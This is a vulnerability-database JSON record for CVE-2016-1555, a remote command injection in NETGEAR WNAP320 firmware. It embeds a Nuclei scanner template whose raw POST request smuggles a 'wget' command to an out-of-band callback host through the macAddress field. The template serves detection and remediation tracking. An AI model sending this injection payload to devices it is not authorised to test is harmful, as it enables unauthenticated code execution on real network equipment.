{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2016-1555/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2016-1555/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2016-1555/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2016-1555/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2016-1555/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2016-1555"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2016-1555"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2016/CVE-2016-1555.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2016-1555\n\ninfo:\n  name: NETGEAR WNAP320 Access Point Firmware - Remote Command Injection\n  author: gy741\n  severity: critical\n  description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n  impact: |\n    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.\n  remediation: |\n    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n  reference:\n    - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE\n    - https://nvd.nist.gov/vuln/detail/CVE-2016-1555\n    - https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic\n    - http://seclists.org/fulldisclosure/2016/Feb/112\n    - http://packetstormsecurity.com/files/135956/D-Link-Netgear-FIRMADYNE-Command-Injection-Buffer-Overflow.html\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2016-1555\n    cwe-id: CWE-77\n    epss-score: 0.98288\n    epss-percentile: 0.99914\n    cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: netgear\n    product: wnap320_firmware\n  tags: cve2016,cve,seclists,packetstorm,netgear,rce,oast,router,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /boardDataWW.php HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/x-www-form-urlencoded\n\n        macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n\n    matchers:\n      - type: word\n        part: interactsh_protocol # Confirms the HTTP Interaction\n        words:\n          - \"http\"\n# digest: 490a0046304402201451604b1fb1bddbe4e27c40f2869e708df986c8e102e7ec4b8a76624026663c022076e96fadd6a3772d401d096df61fc3252cfdc5a54bcee7b9f24a778c54a89a92:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2016-1555"
}